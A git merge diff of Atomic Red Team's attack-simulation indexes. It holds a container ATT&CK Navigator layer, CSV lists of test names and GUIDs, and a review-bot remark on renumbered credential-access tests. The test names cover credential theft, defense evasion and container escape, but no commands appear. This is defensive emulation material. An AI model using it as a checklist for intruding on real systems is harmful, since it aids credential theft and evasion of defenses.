Merge branch 'master' into T1078.003
@@ -1 +1 @@
{"name":"Atomic Red Team (Containers)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1053","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"comment":"\n- Container and ResourceDiscovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}
{"name":"Atomic Red Team (Containers)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1046","score":1,"enabled":true,"comment":"\n- Network Service Discovery for Containers\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1053","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1069","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery for Containers- Local Groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into 
Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"comment":"\n- Build Image On Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"comment":"\n- Container and ResourceDiscovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}
@@ -1,5 +1,6 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
discovery,T1613,Container and Resource Discovery,1,Container and ResourceDiscovery,8a895923-f99f-4668-acf2-6cc59a44f05e,sh
discovery,T1046,Network Service Discovery,9,Network Service Discovery for Containers,06eaafdb-8982-426e-8a31-d572da633caa,sh
credential-access,T1552.007,Kubernetes List Secrets,1,List All Secrets,31e794c4-48fd-4a76-aca4-6587c155bc11,bash
credential-access,T1552.007,Kubernetes List Secrets,2,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
persistence,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
@@ -14,3 +15,4 @@ privilege-escalation,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-
privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh
privilege-escalation,T1611,Escape to Host,2,Mount host filesystem to escape privileged Docker container,6c499943-b098-4bc6-8d38-0956fc182984,sh
defense-evasion,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash
defense-evasion,T1612,Build Image on Host,1,Build Image On Host,2db30061-589d-409b-b125-7b473944f9b3,sh
@@ -250,6 +250,7 @@ defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,
defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
defense-evasion,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
defense-evasion,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
defense-evasion,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,command_prompt
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
@@ -285,6 +286,7 @@ defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,1,Mount
defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell
defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,3,Remove the Zone.Identifier alternate data stream,64b12afc-18b8-4d3f-9eab-7f6cae7c73f9,powershell
defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,4,Execute LNK file from ISO,c2587b8d-743d-4985-aa50-c83394eaeb68,powershell
defense-evasion,T1612,Build Image on Host,1,Build Image On Host,2db30061-589d-409b-b125-7b473944f9b3,sh
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
@@ -304,6 +306,11 @@ defense-evasion,T1564.002,Hide Artifacts: Hidden Users,2,Create Hidden User usin
defense-evasion,T1564.002,Hide Artifacts: Hidden Users,3,Create Hidden User in Registry,173126b7-afe4-45eb-8680-fa9f6400431c,command_prompt
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,3,Clear bash history,878794f7-c511-4199-a950-8c28b3ed8e5b,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,4,Setting the HISTCONTROL environment variable,10ab786a-028e-4465-96f6-9e83ca6c5f24,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,5,Setting the HISTFILESIZE environment variable,5cafd6c1-2f43-46eb-ac47-a5301ba0a618,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,6,Setting the HISTFILE environment variable,b3dacb6c-a9e3-44ec-bf87-38db60c5cad1,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,7,Setting the HISTIGNORE environment variable,f12acddb-7502-4ce6-a146-5b62c59592f1,bash
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
@@ -365,6 +372,7 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,40,Suspend Hi
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,41,Reboot Linux Host via Kernel System Request,6d6d3154-1a52-4d1a-9d51-92ab8148b32e,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,42,Clear Pagging Cache,f790927b-ea85-4a16-b7b2-7eb44176a510,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,43,Disable Memory Swap,e74e4c63-6fde-4ad2-9ee8-21c3a1733114,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,44,Disable Hypervisor-Enforced Code Integrity (HVCI),70bd71e6-eba4-4e00-92f7-617911dbe020,powershell
defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
@@ -553,6 +561,7 @@ privilege-escalation,T1484.001,Domain Policy Modification: Group Policy Modifica
privilege-escalation,T1484.001,Domain Policy Modification: Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
privilege-escalation,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
privilege-escalation,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
privilege-escalation,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,command_prompt
privilege-escalation,T1547.003,Time Providers,1,Create a new time provider,df1efab7-bc6d-4b88-8be9-91f55ae017aa,powershell
privilege-escalation,T1547.003,Time Providers,2,Edit an existing time provider,29e0afca-8d1d-471a-8d34-25512fc48315,powershell
privilege-escalation,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
@@ -838,6 +847,7 @@ persistence,T1574.008,Hijack Execution Flow: Path Interception by Search Order H
persistence,T1505.003,Server Software Component: Web Shell,1,Web Shell Written to Disk,0a2ce662-1efa-496f-a472-2fe7b080db16,command_prompt
persistence,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
persistence,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
persistence,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,command_prompt
persistence,T1547.003,Time Providers,1,Create a new time provider,df1efab7-bc6d-4b88-8be9-91f55ae017aa,powershell
persistence,T1547.003,Time Providers,2,Edit an existing time provider,29e0afca-8d1d-471a-8d34-25512fc48315,powershell
persistence,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
@@ -1158,17 +1168,18 @@ credential-access,T1003.005,OS Credential Dumping: Cached Domain Credentials,1,C
credential-access,T1558.001,Steal or Forge Kerberos Tickets: Golden Ticket,1,Crafting Active Directory golden tickets with mimikatz,9726592a-dabc-4d4d-81cd-44070008b3af,powershell
credential-access,T1558.001,Steal or Forge Kerberos Tickets: Golden Ticket,2,Crafting Active Directory golden tickets with Rubeus,e42d33cd-205c-4acf-ab59-a9f38f6bad9c,powershell
credential-access,T1552.003,Unsecured Credentials: Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,6,WinPwn - sensitivefiles,114dd4e3-8d1c-4ea7-bb8d-8d8f6aca21f0,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,7,WinPwn - Snaffler,fdd0c913-714b-4c13-b40f-1824d6c015f2,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,8,WinPwn - powershellsensitive,75f66e03-37d3-4704-9520-3210efbe33ce,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,9,WinPwn - passhunt,00e3e3c7-6c3c-455e-bd4b-461c7f0e7797,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,10,WinPwn - SessionGopher,c9dc9de3-f961-4284-bd2d-f959c9f9fda5,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,11,"WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials",aaa87b0e-5232-4649-ae5c-f1724a4b2798,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Find AWS credentials,2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,2,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,3,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,4,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,5,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,6,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,7,WinPwn - sensitivefiles,114dd4e3-8d1c-4ea7-bb8d-8d8f6aca21f0,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,8,WinPwn - Snaffler,fdd0c913-714b-4c13-b40f-1824d6c015f2,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,9,WinPwn - powershellsensitive,75f66e03-37d3-4704-9520-3210efbe33ce,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,10,WinPwn - passhunt,00e3e3c7-6c3c-455e-bd4b-461c7f0e7797,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,11,WinPwn - SessionGopher,c9dc9de3-f961-4284-bd2d-f959c9f9fda5,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,12,"WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials",aaa87b0e-5232-4649-ae5c-f1724a4b2798,powershell
credential-access,T1528,Steal Application Access Token,1,Azure - Dump All Azure Key Vaults with Microburst,1b83cddb-eaa7-45aa-98a5-85fb0a8807ea,powershell
credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
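Review bot: The new T1552.001 rows renumber every existing test — the old list ran 1–11 with LaZagne as test 1, the new list inserts "Find AWS credentials" as test 1 and shifts the rest to 2–12, so any coverage map or tooling that keys on the `Test #` column will silently point at a different atomic after this merge. The `Test GUID` column is unchanged between the old and new rows (LaZagne stays `9e507bb8-1d30-4e3b-a49b-cb5727d7ea79`), so consumers should key on the GUID rather than the positional number. If this index is generated from the technique's atomic definitions, appending the new test after the existing ones there would keep the numbering stable; the same shift appears in the Linux index hunk `@@ -194,8 +199,9 @@` and in the hunk `@@ -162,9 +165,10 @@`, which runs past the end of this page.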
@@ -1363,6 +1374,7 @@ discovery,T1069.001,Permission Groups Discovery: Local Groups,3,Permission Group
discovery,T1069.001,Permission Groups Discovery: Local Groups,4,SharpHound3 - LocalAdmin,e03ada14-0980-4107-aff1-7783b2b59bb1,powershell
discovery,T1069.001,Permission Groups Discovery: Local Groups,5,Wmic Group Discovery,7413be50-be8e-430f-ad4d-07bf197884b2,powershell
discovery,T1069.001,Permission Groups Discovery: Local Groups,6,WMIObject Group Discovery,69119e58-96db-4110-ad27-954e48f3bb13,powershell
discovery,T1069.001,Permission Groups Discovery: Local Groups,7,Permission Groups Discovery for Containers- Local Groups,007d7aa4-8c4d-4f55-ba6a-7c965d51219c,sh
discovery,T1201,Password Policy Discovery,1,Examine password complexity policy - Ubuntu,085fe567-ac84-47c7-ac4c-2688ce28265b,bash
discovery,T1201,Password Policy Discovery,2,Examine password complexity policy - CentOS/RHEL 7.x,78a12e65-efff-4617-bc01-88f17d71315d,bash
discovery,T1201,Password Policy Discovery,3,Examine password complexity policy - CentOS/RHEL 6.x,6ce12552-0adb-4f56-89ff-95ce268f6358,bash
@@ -1410,14 +1422,15 @@ discovery,T1018,Remote System Discovery,17,Enumerate Active Directory Computers
discovery,T1018,Remote System Discovery,18,Get-DomainController with PowerView,b9d2e8ca-5520-4737-8076-4f08913da2c4,powershell
discovery,T1018,Remote System Discovery,19,Get-wmiobject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
discovery,T1018,Remote System Discovery,20,Remote System Discovery - net group Domain Controller,5843529a-5056-4bc1-9c13-a311e2af4ca0,command_prompt
discovery,T1046,Network Service Scanning,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
discovery,T1046,Network Service Scanning,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
discovery,T1046,Network Service Scanning,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
discovery,T1046,Network Service Scanning,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
discovery,T1046,Network Service Scanning,5,WinPwn - spoolvulnscan,54574908-f1de-4356-9021-8053dd57439a,powershell
discovery,T1046,Network Service Scanning,6,WinPwn - MS17-10,97585b04-5be2-40e9-8c31-82157b8af2d6,powershell
discovery,T1046,Network Service Scanning,7,WinPwn - bluekeep,1cca5640-32a9-46e6-b8e0-fabbe2384a73,powershell
discovery,T1046,Network Service Scanning,8,WinPwn - fruit,bb037826-cbe8-4a41-93ea-b94059d6bb98,powershell
discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
discovery,T1046,Network Service Discovery,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
discovery,T1046,Network Service Discovery,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
discovery,T1046,Network Service Discovery,5,WinPwn - spoolvulnscan,54574908-f1de-4356-9021-8053dd57439a,powershell
discovery,T1046,Network Service Discovery,6,WinPwn - MS17-10,97585b04-5be2-40e9-8c31-82157b8af2d6,powershell
discovery,T1046,Network Service Discovery,7,WinPwn - bluekeep,1cca5640-32a9-46e6-b8e0-fabbe2384a73,powershell
discovery,T1046,Network Service Discovery,8,WinPwn - fruit,bb037826-cbe8-4a41-93ea-b94059d6bb98,powershell
discovery,T1046,Network Service Discovery,9,Network Service Discovery for Containers,06eaafdb-8982-426e-8a31-d572da633caa,sh
discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
@@ -1540,6 +1553,7 @@ initial-access,T1091,Replication Through Removable Media,1,USB Malware Spread Si
initial-access,T1195,Supply Chain Compromise,1,Octopus Scanner Malware Open Source Supply Chain,82a9f001-94c5-495e-9ed5-f530dbded5e2,command_prompt
initial-access,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
initial-access,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
initial-access,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,command_prompt
initial-access,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
initial-access,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
initial-access,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
@@ -69,6 +69,11 @@ defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,1,Auditing Configu
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,2,Logging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,3,Clear bash history,878794f7-c511-4199-a950-8c28b3ed8e5b,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,4,Setting the HISTCONTROL environment variable,10ab786a-028e-4465-96f6-9e83ca6c5f24,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,5,Setting the HISTFILESIZE environment variable,5cafd6c1-2f43-46eb-ac47-a5301ba0a618,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,6,Setting the HISTFILE environment variable,b3dacb6c-a9e3-44ec-bf87-38db60c5cad1,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,7,Setting the HISTIGNORE environment variable,f12acddb-7502-4ce6-a146-5b62c59592f1,bash
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
@@ -194,8 +199,9 @@ credential-access,T1552.004,Unsecured Credentials: Private Keys,3,Copy Private S
credential-access,T1552.004,Unsecured Credentials: Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,5,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh
credential-access,T1552.003,Unsecured Credentials: Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Find AWS credentials,2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,3,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,6,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
credential-access,T1110.004,Brute Force: Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
credential-access,T1003.008,OS Credential Dumping: /etc/passwd and /etc/shadow,1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash
credential-access,T1003.008,OS Credential Dumping: /etc/passwd and /etc/shadow,2,Access /etc/passwd (Local),60e860b6-8ae6-49db-ad07-5e73edd88f5d,sh
@@ -243,8 +249,8 @@ discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db26
discovery,T1018,Remote System Discovery,12,Remote System Discovery - ip neighbour,158bd4dd-6359-40ab-b13c-285b9ef6fa25,sh
discovery,T1018,Remote System Discovery,13,Remote System Discovery - ip route,1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1,sh
discovery,T1018,Remote System Discovery,14,Remote System Discovery - ip tcp_metrics,6c2da894-0b57-43cb-87af-46ea3b501388,sh
discovery,T1046,Network Service Scanning,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
discovery,T1046,Network Service Scanning,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
command-and-control,T1090.003,Proxy: Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
@@ -45,6 +45,7 @@ defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,3,Set a file's cr
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
